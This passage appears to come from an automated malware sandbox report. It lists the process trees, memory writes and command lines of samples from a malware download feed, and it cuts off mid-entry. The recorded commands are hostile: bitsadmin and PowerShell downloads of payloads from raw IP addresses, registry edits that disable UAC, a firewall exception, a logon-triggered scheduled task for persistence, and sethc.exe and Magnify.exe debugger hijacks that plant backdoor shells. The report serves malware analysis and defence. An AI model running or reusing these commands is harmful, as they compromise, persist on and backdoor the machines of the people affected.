N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2468 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 3604 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 524 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\ping.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5012 wrote to memory of 4580 N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 3604 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 232 wrote to memory of 2368 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 2916 wrote to memory of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
PID 3604 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe
PID 3604 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 5056 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 916 N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe C:\Windows\SysWOW64\cmd.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5056 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 916 wrote to memory of 2472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 2368 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 916 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\http.exe
PID 1004 wrote to memory of 932 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1004 wrote to memory of 932 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 932 wrote to memory of 3008 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe"

C:\Windows\SysWOW64\ping.exe

ping -n 1 8.8.8.8

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\langla.exe

"C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

"C:\Users\Admin\Downloads\UrlHausFiles\22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE81E.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"

C:\Users\Admin\AppData\Roaming\http.exe

"C:\Users\Admin\AppData\Roaming\http.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffeaf67cc40,0x7ffeaf67cc4c,0x7ffeaf67cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4656,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5520,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D69.tmp\D6A.tmp\D6B.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10C4.tmp\10C5.tmp\10C6.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1960 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe

"C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4349545209397118218,18204725807592143253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 940

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5740 -ip 5740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 960

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

